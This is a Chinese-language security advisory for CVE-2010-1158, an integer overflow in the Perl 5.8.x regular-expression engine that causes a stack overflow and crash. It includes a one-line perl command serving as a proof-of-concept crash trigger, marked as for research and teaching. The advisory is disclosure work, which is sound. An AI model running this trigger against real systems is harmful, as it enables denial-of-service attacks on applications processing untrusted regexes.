发布日期：2010-04-08
更新日期：2010-04-22

受影响系统：

Larry Wall Perl 5.8.x

描述：

---

CVE ID: CVE-2010-1158

Perl是一种免费且功能强大的编程语言。

Perl的正则表达式引擎中存在最终可导致栈溢出的整数溢出漏洞，用户受骗处理了恶意的正则表达式就可以触发这个溢出，导致应用程序崩溃。

<*来源：Bruce Merry （bmerry@gmail.com）
  
  链接：http://bugs.gentoo.org/show_bug.cgi?format=multiple&id=313565
        https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=580605
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

perl -e 'if ((("a " x 100000) . "a\n") =~ /\A\S+(?: \S+)*\n\z/) {}'

建议：

---

厂商补丁：

Larry Wall
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.perl.org/

浏览次数：2114
严重程度：0（网友投票）